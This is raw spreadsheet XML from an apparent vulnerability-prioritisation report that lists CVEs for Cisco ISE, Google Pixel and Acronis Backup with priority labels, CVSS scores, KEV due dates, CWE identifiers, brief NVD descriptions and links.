    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1582" r:id="rId1581"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1583" r:id="rId1582"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1584" r:id="rId1583"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1585" r:id="rId1584"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1586" r:id="rId1585"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1587" r:id="rId1586"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1588" r:id="rId1587"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1589" r:id="rId1588"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1590" r:id="rId1589"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1591" r:id="rId1590"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1592" r:id="rId1591"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1593" r:id="rId1592"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1594" r:id="rId1593"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1595" r:id="rId1594"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1596" r:id="rId1595"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1597" r:id="rId1596"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1598" r:id="rId1597"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1599" r:id="rId1598"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1600" r:id="rId1599"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1601" r:id="rId1600"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1602" r:id="rId1601"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1603" r:id="rId1602"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1604" r:id="rId1603"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1605" r:id="rId1604"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1606" r:id="rId1605"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1607" r:id="rId1606"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1608" r:id="rId1607"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1609" r:id="rId1608"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1610" r:id="rId1609"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1611" r:id="rId1610"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1612" r:id="rId1611"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1613" r:id="rId1612"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1614" r:id="rId1613"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1615" r:id="rId1614"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1616" r:id="rId1615"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1617" r:id="rId1616"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1618" r:id="rId1617"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1619" r:id="rId1618"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1620" r:id="rId1619"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1621" r:id="rId1620"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1622" r:id="rId1621"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1623" r:id="rId1622"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1624" r:id="rId1623"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1625" r:id="rId1624"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1626" r:id="rId1625"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1627" r:id="rId1626"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1628" r:id="rId1627"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1629" r:id="rId1628"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1630" r:id="rId1629"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1631" r:id="rId1630"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1632" r:id="rId1631"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1633" r:id="rId1632"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1634" r:id="rId1633"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1635" r:id="rId1634"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1636" r:id="rId1635"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1637" r:id="rId1636"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1638" r:id="rId1637"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1639" r:id="rId1638"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1640" r:id="rId1639"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1641" r:id="rId1640"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1642" r:id="rId1641"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1643" r:id="rId1642"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1644" r:id="rId1643"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1645" r:id="rId1644"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1646" r:id="rId1645"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1647" r:id="rId1646"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1648" r:id="rId1647"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1649" r:id="rId1648"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1650" r:id="rId1649"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1651" r:id="rId1650"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1652" r:id="rId1651"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1653" r:id="rId1652"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1654" r:id="rId1653"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1655" r:id="rId1654"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1656" r:id="rId1655"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1657" r:id="rId1656"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1658" r:id="rId1657"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1659" r:id="rId1658"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1660" r:id="rId1659"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1661" r:id="rId1660"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1662" r:id="rId1661"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1663" r:id="rId1662"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1664" r:id="rId1663"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1665" r:id="rId1664"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1666" r:id="rId1665"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1667" r:id="rId1666"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1668" r:id="rId1667"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1669" r:id="rId1668"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1670" r:id="rId1669"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1671" r:id="rId1670"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1672" r:id="rId1671"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1673" r:id="rId1672"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1674" r:id="rId1673"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1675" r:id="rId1674"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1676" r:id="rId1675"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1677" r:id="rId1676"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1678" r:id="rId1677"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1679" r:id="rId1678"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1680" r:id="rId1679"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1681" r:id="rId1680"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1682" r:id="rId1681"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1683" r:id="rId1682"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1684" r:id="rId1683"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1685" r:id="rId1684"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1686" r:id="rId1685"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1687" r:id="rId1686"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1688" r:id="rId1687"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1689" r:id="rId1688"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1690" r:id="rId1689"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1691" r:id="rId1690"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1692" r:id="rId1691"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1693" r:id="rId1692"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1694" r:id="rId1693"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1695" r:id="rId1694"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1696" r:id="rId1695"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1697" r:id="rId1696"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1698" r:id="rId1697"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1699" r:id="rId169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18" customWidth="1" min="3" max="3"/>
    <col width="7" customWidth="1" min="4" max="4"/>
    <col width="10" customWidth="1" min="5" max="5"/>
    <col width="10" customWidth="1" min="6" max="6"/>
    <col width="6" customWidth="1" min="7" max="7"/>
    <col width="7" customWidth="1" min="8" max="8"/>
    <col width="9" customWidth="1" min="9" max="9"/>
    <col width="16" customWidth="1" min="10" max="10"/>
    <col width="28" customWidth="1" min="11" max="11"/>
    <col width="28" customWidth="1" min="12" max="12"/>
    <col width="14" customWidth="1" min="13" max="13"/>
    <col width="18" customWidth="1" min="14" max="14"/>
    <col width="12" customWidth="1" min="15" max="15"/>
    <col width="11" customWidth="1" min="16" max="16"/>
    <col width="12" customWidth="1" min="17" max="17"/>
    <col width="90" customWidth="1" min="18" max="18"/>
    <col width="42" customWidth="1" min="19" max="19"/>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KEV Due</t>
        </is>
      </c>
      <c r="Q1" s="4" t="inlineStr">
        <is>
          <t>CWE</t>
        </is>
      </c>
      <c r="R1" s="4" t="inlineStr">
        <is>
          <t>Description</t>
        </is>
      </c>
      <c r="S1" s="4" t="inlineStr">
        <is>
          <t>Link</t>
        </is>
      </c>
    </row>
    <row r="2">
      <c r="A2" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B2" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C2" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76460</t>
        </is>
      </c>
      <c r="D2" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E2" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F2" s="5" t="inlineStr">
        <is>
          <t>psirt@cisco.com</t>
        </is>
      </c>
      <c r="G2" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H2" s="5" t="inlineStr"/>
      <c r="I2" s="5" t="inlineStr"/>
      <c r="J2" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K2" s="5" t="inlineStr">
        <is>
          <t>cisco:identity services engine</t>
        </is>
      </c>
      <c r="L2" s="5" t="inlineStr"/>
      <c r="M2" s="5" t="inlineStr"/>
      <c r="N2" s="5" t="inlineStr">
        <is>
          <t>KEV, NVD</t>
        </is>
      </c>
      <c r="O2" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P2" s="5" t="inlineStr">
        <is>
          <t>2026-09-19</t>
        </is>
      </c>
      <c r="Q2" s="5" t="inlineStr">
        <is>
          <t>CWE-648</t>
        </is>
      </c>
      <c r="R2" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in an API of Cisco Identity Services Engine (ISE) could allow an unauthenticated, remote attacker to bypass authentication.
This vulnerability is due to insufficient authentication control on an API endpoint. An attacker could exploit this vulnerability by sending a crafted request to an affected API endpoint. A successful exploit could allow the attacker to gain unauthorized access to the affected device by bypassing the web-based management interface.</t>
        </is>
      </c>
      <c r="S2" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76460</t>
        </is>
      </c>
    </row>
    <row r="3">
      <c r="A3" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B3" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C3" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58704</t>
        </is>
      </c>
      <c r="D3" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E3" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F3" s="5" t="inlineStr">
        <is>
          <t>CISA-ADP</t>
        </is>
      </c>
      <c r="G3" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H3" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I3" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J3" s="5" t="inlineStr"/>
      <c r="K3" s="5" t="inlineStr">
        <is>
          <t>google:pixel</t>
        </is>
      </c>
      <c r="L3" s="5" t="inlineStr"/>
      <c r="M3" s="5" t="inlineStr"/>
      <c r="N3" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O3" s="5" t="inlineStr"/>
      <c r="P3" s="5" t="inlineStr">
        <is>
          <t>2026-09-19</t>
        </is>
      </c>
      <c r="Q3" s="5" t="inlineStr">
        <is>
          <t>CWE-285, CWE-693</t>
        </is>
      </c>
      <c r="R3" s="5" t="inlineStr">
        <is>
          <t>Google Pixel devices contain an improper authorization vulnerability in the cellular modem. A logic error may allow an attacker to bypass permission checks and escalate privileges.</t>
        </is>
      </c>
      <c r="S3" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58704</t>
        </is>
      </c>
    </row>
    <row r="4">
      <c r="A4" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B4" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C4" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87886</t>
        </is>
      </c>
      <c r="D4" s="5" t="inlineStr"/>
      <c r="E4" s="5" t="inlineStr"/>
      <c r="F4" s="5" t="inlineStr"/>
      <c r="G4" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H4" s="5" t="inlineStr"/>
      <c r="I4" s="5" t="inlineStr"/>
      <c r="J4" s="5" t="inlineStr"/>
      <c r="K4" s="5" t="inlineStr">
        <is>
          <t>acronis:backup</t>
        </is>
      </c>
      <c r="L4" s="5" t="inlineStr"/>
      <c r="M4" s="5" t="inlineStr"/>
      <c r="N4" s="5" t="inlineStr">
        <is>
          <t>KEV</t>
        </is>
      </c>
      <c r="O4" s="5" t="inlineStr"/>
      <c r="P4" s="5" t="inlineStr">
        <is>
          <t>2026-09-19</t>
        </is>
      </c>
      <c r="Q4" s="5" t="inlineStr"/>
      <c r="R4" s="5" t="inlineStr">
        <is>
          <t>Acronis Backup plugin for cPanel &amp; WHM and extension for Plesk contains an incorrect default permissions vulnerability that could allow for privilege escalation.</t>
        </is>
      </c>
      <c r="S4" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87886</t>
        </is>
      </c>
    </row>
  </sheetData>
  <autoFilter ref="A1:S4"/>
  <conditionalFormatting sqref="E2:E4">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4">
    <cfRule type="cellIs" priority="5" operator="equal" dxfId="4">
      <formula>"Yes"</formula>
    </cfRule>
  </conditionalFormatting>
  <hyperlinks>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2" r:id="rId1"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S3" r:id="rId2"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S4" r:id="rId3"/>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82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18" customWidth="1" min="3" max="3"/>
    <col width="7" customWidth="1" min="4" max="4"/>
    <col width="10" customWidth="1" min="5" max="5"/>
    <col width="10" customWidth="1" min="6" max="6"/>
    <col width="6" customWidth="1" min="7" max="7"/>
    <col width="7" customWidth="1" min="8" max="8"/>
    <col width="9" customWidth="1" min="9" max="9"/>
    <col width="16" customWidth="1" min="10" max="10"/>
    <col width="28" customWidth="1" min="11" max="11"/>
    <col width="28" customWidth="1" min="12" max="12"/>
    <col width="14" customWidth="1" min="13" max="13"/>
    <col width="18" customWidth="1" min="14" max="14"/>
    <col width="12" customWidth="1" min="15" max="15"/>
    <col width="11" customWidth="1" min="16" max="16"/>
    <col width="12" customWidth="1" min="17" max="17"/>
    <col width="90" customWidth="1" min="18" max="18"/>
    <col width="42" customWidth="1" min="19" max="19"/>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KEV Due</t>
        </is>
      </c>
      <c r="Q1" s="4" t="inlineStr">
        <is>
          <t>CWE</t>
        </is>
      </c>
      <c r="R1" s="4" t="inlineStr">
        <is>
          <t>Description</t>
        </is>
      </c>
      <c r="S1" s="4" t="inlineStr">
        <is>
          <t>Link</t>
        </is>
      </c>
    </row>
    <row r="2">
      <c r="A2" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B2" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C2" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76460</t>
        </is>
      </c>
      <c r="D2" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E2" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F2" s="5" t="inlineStr">
        <is>
          <t>psirt@cisco.com</t>
        </is>
      </c>
      <c r="G2" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H2" s="5" t="inlineStr"/>
      <c r="I2" s="5" t="inlineStr"/>
      <c r="J2" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K2" s="5" t="inlineStr">
        <is>
          <t>cisco:identity services engine</t>
        </is>
      </c>
      <c r="L2" s="5" t="inlineStr"/>
      <c r="M2" s="5" t="inlineStr"/>
      <c r="N2" s="5" t="inlineStr">
        <is>
          <t>KEV, NVD</t>
        </is>
      </c>
      <c r="O2" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P2" s="5" t="inlineStr">
        <is>
          <t>2026-09-19</t>
        </is>
      </c>
      <c r="Q2" s="5" t="inlineStr">
        <is>
          <t>CWE-648</t>
        </is>
      </c>
      <c r="R2" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in an API of Cisco Identity Services Engine (ISE) could allow an unauthenticated, remote attacker to bypass authentication.
This vulnerability is due to insufficient authentication control on an API endpoint. An attacker could exploit this vulnerability by sending a crafted request to an affected API endpoint. A successful exploit could allow the attacker to gain unauthorized access to the affected device by bypassing the web-based management interface.</t>
        </is>
      </c>
      <c r="S2" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76460</t>
        </is>
      </c>
    </row>
    <row r="3">
      <c r="A3" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B3" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C3" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58704</t>
        </is>
      </c>
      <c r="D3" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E3" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F3" s="5" t="inlineStr">
        <is>
          <t>CISA-ADP</t>
        </is>
      </c>
      <c r="G3" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H3" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I3" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J3" s="5" t="inlineStr"/>
      <c r="K3" s="5" t="inlineStr">
        <is>
          <t>google:pixel</t>
        </is>
      </c>
      <c r="L3" s="5" t="inlineStr"/>
      <c r="M3" s="5" t="inlineStr"/>
      <c r="N3" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O3" s="5" t="inlineStr"/>
      <c r="P3" s="5" t="inlineStr">
        <is>
          <t>2026-09-19</t>
        </is>
      </c>
      <c r="Q3" s="5" t="inlineStr">
        <is>
          <t>CWE-285, CWE-693</t>
        </is>
      </c>
      <c r="R3" s="5" t="inlineStr">
        <is>
          <t>Google Pixel devices contain an improper authorization vulnerability in the cellular modem. A logic error may allow an attacker to bypass permission checks and escalate privileges.</t>
        </is>
      </c>
      <c r="S3" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58704</t>
        </is>
      </c>
    </row>
    <row r="4">
      <c r="A4" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B4" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C4" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20130</t>
        </is>
      </c>
      <c r="D4" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E4" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F4" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G4" s="5" t="inlineStr"/>
      <c r="H4" s="5" t="inlineStr"/>
      <c r="I4" s="5" t="inlineStr"/>
      <c r="J4" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K4" s="5" t="inlineStr"/>
      <c r="L4" s="5" t="inlineStr"/>
      <c r="M4" s="5" t="inlineStr"/>
      <c r="N4" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O4" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P4" s="5" t="inlineStr"/>
      <c r="Q4" s="5" t="inlineStr">
        <is>
          <t>CWE-74</t>
        </is>
      </c>
      <c r="R4" s="5" t="inlineStr">
        <is>
          <t>As part of Cisco's ongoing commitment to proactive security and product quality, the Cisco Identity Services Engine (ISE) and Cisco ISE Passive Identity Connector (ISE-PIC), engineering teams have conducted a comprehensive internal security review. This review resulted in a software hardening release that addresses multiple internally discovered vulnerabilities.
The vulnerabilities tracked by CVE-2026-20130 are related to improper neutralization of special elements issues that are grouped under the Common Weakness Enumeration (CWE) Pillar CWE-74.</t>
        </is>
      </c>
      <c r="S4" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20130</t>
        </is>
      </c>
    </row>
    <row r="5">
      <c r="A5" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B5" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C5" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20192</t>
        </is>
      </c>
      <c r="D5" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E5" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F5" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G5" s="5" t="inlineStr"/>
      <c r="H5" s="5" t="inlineStr"/>
      <c r="I5" s="5" t="inlineStr"/>
      <c r="J5" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K5" s="5" t="inlineStr"/>
      <c r="L5" s="5" t="inlineStr"/>
      <c r="M5" s="5" t="inlineStr"/>
      <c r="N5" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O5" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P5" s="5" t="inlineStr"/>
      <c r="Q5" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="R5" s="5" t="inlineStr">
        <is>
          <t>As part of Cisco's ongoing commitment to proactive security and product quality, the Cisco Identity Services Engine (ISE) and Cisco ISE Passive Identity Connector (ISE-PIC) engineering teams have conducted a comprehensive internal security review. This review resulted in a software hardening release that addresses multiple internally discovered vulnerabilities.
